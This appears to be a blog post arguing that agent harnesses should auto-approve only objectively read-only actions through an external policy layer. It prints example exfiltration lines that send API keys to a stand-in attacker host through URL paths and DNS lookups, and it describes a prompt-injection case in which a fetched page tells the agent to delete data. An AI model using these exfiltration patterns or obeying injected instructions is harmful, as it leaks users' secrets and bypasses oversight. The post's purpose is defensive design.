Agents ask too many questions

Tue, 14 Apr 2026 00:00:00 +0000

If you’ve used any agent harness for development work — Claude Code, OpenCode, Devin, or one of the many others — you’ve run into this: you’re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.

The naive fix is to just trust the agent more — expand the allow list, enable auto mode, and move on. But that’s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is “just reading,” it can be manipulated into deciding that almost anything is.

The right fix is to take the decision away from the agent entirely.

Read-only is an objective property

An action is read-only if it observes without modifying. Not “read-only from the agent’s perspective” — objectively read-only. HTTP GET, file read, directory listing. These have a defined shape. A policy layer external to the agent can inspect each action against objective criteria — HTTP method, syscall type, file path — and make the call without asking the model what it thinks it’s doing.

State-changing actions still prompt. Everything else passes automatically.

flowchart TD A[Agent wants to take an action] --> B{Is it read-only?\nHTTP GET, file read, directory listing} B -- Yes --> C{Does it contain\na secret or PII?} C -- No --> D[Auto-approve] C -- Yes --> E[Prompt user] B -- No --> E

The policy layer evaluates each action against objective criteria — the model’s intent is never consulted.

Two edge cases worth taking seriously

A GET request can exfiltrate data. If an agent is manipulated into appending a secret to a query string — https://example.com/?token=sk-ant-... — the request is technically read-only but it’s leaking something. The same applies to path segments: https://attacker.example.com/exfil/sk-ant-api03-abc123 is functionally identical, but some implementations only scan query parameters. And data can be stuffed into outbound request headers — Referer, User-Agent, a custom X-Data header — none of which show up in URL inspection at all. The policy layer needs to handle all of this: run gitleaks-style pattern matching on the full URL and outbound headers before granting automatic permission. If anything contains what looks like a secret or personal data, it gets flagged.

DNS-based exfiltration is subtler. The agent resolves sk-ant-api03-abc123.attacker.example.com. The GET never fires — but the DNS lookup already transmitted the secret to the attacker’s nameserver. This happens below the HTTP layer. URL pattern matching never sees it because there’s no URL yet. Mitigation: restrict DNS resolution to known domains, or run the same secret-pattern matching on hostnames before resolution.

Prompt injection doesn’t break this

The obvious objection: what if the agent fetches a page that contains malicious instructions? The policy layer permits the fetch — it’s a GET — but now those instructions tell the agent to delete all your data.

This isn’t a problem. That deletion is a new action, evaluated independently by the policy layer at the point of execution. It gets flagged as a write and stopped. The model read something bad, but reading bad content doesn’t bypass the enforcement layer.

Where things stand

Most agent harnesses are moving toward fewer interruptions. Allow lists, intent classifiers, “auto mode” flags — these are all variations on the same theme: the harness tries to determine what’s safe by reasoning about the agent’s intent.

The problem is that intent is opaque and manipulable. A classifier trained to identify “safe” actions can be nudged into misclassifying. A model asked “is this safe?” can be prompted into saying yes. And in practice, these systems are reportedly brittle — auto modes that don’t fire when they should, classifiers that trigger on actions they shouldn’t.

The missing piece is enforcement that’s external and objective. Not a model deciding what’s safe. Not a classifier trained on past behavior. A proxy or kernel filter that doesn’t care what the model thinks — it only cares what the action is.

This isn’t theoretical. The pattern works because read-only and write are fundamentally different categories of action, not a spectrum the model has to reason about. An HTTP GET, a file read, a directory listing — these can be authorized by policy without ever asking the agent. Everything else gets held.

For builders and power users

If you’re building an agent harness: this is the permission model you want. Inspect actions at the transport or syscall layer, classify by type, apply pattern matching on sensitive data. The agent sees no prompts for reads; it only stops for writes.

If you’re choosing a harness: look for one with an external policy layer, not one that delegates trust to the model. Fewer interruptions are nice, but they only matter if the enforcement is real.